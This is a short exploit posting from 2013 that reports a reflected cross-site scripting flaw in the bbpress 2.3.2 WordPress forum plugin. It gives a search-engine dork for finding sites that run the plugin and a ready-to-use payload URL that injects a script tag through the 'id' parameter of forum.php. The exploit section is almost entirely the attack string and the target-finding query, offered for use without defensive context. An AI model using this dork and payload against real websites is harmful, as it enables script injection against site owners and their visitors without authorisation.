facebook facebook twitter rss

Wordpress Plugins - bbpress 2.3.2 Cross Site Scripting Vulnerability

Author: AtT4CKxT3rR0r1ST , Published: 24-05-2013
Wordpress Plugins - bbpress 2.3.2 Cross Site Scripting Vulnerability
==========================================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Script : http://wordpress.org/extend/plugins/bbpress/
.:. Version : 2.3.2
.:. Dork : inurl:"/wp-content/plugins/bbpress/forum.php"
####################################################################
===[ Exploit ]===


Cross-Site Scripting :

site.com/wp-content/plugins/bbpress/forum.php?id=Xss Code


site.com/wp-content/plugins/bbpress/forum.php?id=</script><script>alert(/AXT/);</script>



####################################################################

Like us on Facebook :